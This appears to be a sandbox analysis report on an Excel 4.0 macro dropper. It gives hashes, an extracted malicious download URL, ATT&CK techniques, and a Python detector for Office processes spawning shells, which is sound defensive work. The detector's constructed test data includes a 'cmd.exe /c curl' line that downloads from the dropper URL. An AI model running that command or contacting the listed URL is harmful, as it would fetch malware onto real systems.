General

  • Target

    7343c2f1c8923a7f77f71e8e4dcc9180212c13f5040fd1b513d4f26fd30bad41

  • Size

    36KB

  • Sample

    230129-x2y42scb31

  • MD5

    4e258fc16f9f1bd37a59896f9d56beb4

  • SHA1

    af80d1c572dcf5a227dc2bfa341433967242b11f

  • SHA256

    7343c2f1c8923a7f77f71e8e4dcc9180212c13f5040fd1b513d4f26fd30bad41

  • SHA512

    5d631619c1e47cafc03de68d62f11997189ac03313c8cb79dab3d5f2a070b5e27be8aa7e71e9dae23684d8f4e726a05a64e6c10626a4e4cf033d8e5551720597

  • SSDEEP

    768:EPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJugTyRZLAHWl:gok3hbdlylKsgqopeJBWhZFGkE+cL2Nt

Score
10/10

Malware Config

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    https://markens.online/wp-data.php

Targets

    • Target

      7343c2f1c8923a7f77f71e8e4dcc9180212c13f5040fd1b513d4f26fd30bad41

    • Size

      36KB

    • MD5

      4e258fc16f9f1bd37a59896f9d56beb4

    • SHA1

      af80d1c572dcf5a227dc2bfa341433967242b11f

    • SHA256

      7343c2f1c8923a7f77f71e8e4dcc9180212c13f5040fd1b513d4f26fd30bad41

    • SHA512

      5d631619c1e47cafc03de68d62f11997189ac03313c8cb79dab3d5f2a070b5e27be8aa7e71e9dae23684d8f4e726a05a64e6c10626a4e4cf033d8e5551720597

    • SSDEEP

      768:EPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJugTyRZLAHWl:gok3hbdlylKsgqopeJBWhZFGkE+cL2Nt

    Score
    10/10

    • Process spawned unexpected child process

      The parent process launched a child it would not start in normal use. This typically indicates the parent was compromised via an exploit or a malicious macro; for this sample the vector is the Excel 4.0 (XLM) macro dropper recorded under Malware Config.
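The signature above is a parent/child process check. As an added example (not part of the sandbox report or its vendor's detection logic), the Python below runs that check over a few constructed Sysmon Event ID 1 style process-creation events and also matches the URL from the Malware Config section against observed command lines. The process paths, command lines, workbook name and the benign-child allowlist are assumptions for illustration.

```python
"""Detection for "Office process spawned unexpected child" plus IOC matching.

Added example, not taken from the sandbox report. Event records are constructed
to resemble Sysmon Event ID 1 (process creation) fields.
"""
import re
from dataclasses import dataclass

# Parents that should not normally launch shells, script hosts or LOLBins.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Children an Office process does legitimately spawn (assumption; tune per estate).
BENIGN_CHILDREN = {"splwow64.exe", "dw20.exe", "excel.exe", "winword.exe"}

# Indicators copied from the report's Malware Config section.
IOC_URLS = {"https://markens.online/wp-data.php"}
IOC_DOMAINS = {"markens.online"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 fields used by the checks below."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def unexpected_children(events):
    """Return (parent, child) pairs where an Office process spawned something
    outside its expected child set, i.e. the behaviour the sandbox flagged."""
    hits = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        if parent in OFFICE_PARENTS and child not in BENIGN_CHILDREN:
            hits.append((parent, child))
    return hits


def ioc_matches(events):
    """Return the set of report URLs (or URLs on the report domain) seen in
    command lines. Trailing punctuation is stripped before comparison."""
    found = set()
    for ev in events:
        for url in URL_RE.findall(ev.command_line):
            url = url.rstrip(".,;)")
            host = url.split("//", 1)[1].split("/", 1)[0].lower()
            if url in IOC_URLS or host in IOC_DOMAINS:
                found.add(url)
    return found


# Constructed events; paths, workbook name and command lines are assumptions,
# not observations from the sandbox run.
OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    # explorer.exe opening a workbook: not an Office parent, no hit
    ProcEvent(r"C:\Windows\explorer.exe", OFFICE_DIR + r"\EXCEL.EXE",
              '"' + OFFICE_DIR + r'\EXCEL.EXE" C:\Users\user\Downloads\invoice.xls'),
    # print spooler helper: expected child of Excel, no hit
    ProcEvent(OFFICE_DIR + r"\EXCEL.EXE", r"C:\Windows\splwow64.exe",
              r"C:\Windows\splwow64.exe 12288"),
    # shell spawned by Excel fetching the dropper URL: hit on both checks
    ProcEvent(OFFICE_DIR + r"\EXCEL.EXE", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c curl https://markens.online/wp-data.php -o C:\Users\Public\wp.dat"),
]

if __name__ == "__main__":
    for parent, child in unexpected_children(SAMPLE_EVENTS):
        print(f"unexpected child: {parent} -> {child}")
    for ioc in sorted(ioc_matches(SAMPLE_EVENTS)):
        print(f"IOC hit: {ioc}")
```

In production the events would come from Sysmon or EDR telemetry rather than a list literal; the benign-child allowlist is the part that needs tuning, since an allowlist that is too wide hides exactly the LOLBin launches (cmd.exe, regsvr32.exe, rundll32.exe, mshta.exe) that an XLM dropper relies on.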

MITRE ATT&CK Matrix (ATT&CK v6)

Tactic            Technique                       Count   ID
Defense Evasion   Modify Registry                 1       T1112
Discovery         Query Registry                  2       T1012
Discovery         System Information Discovery    2       T1082
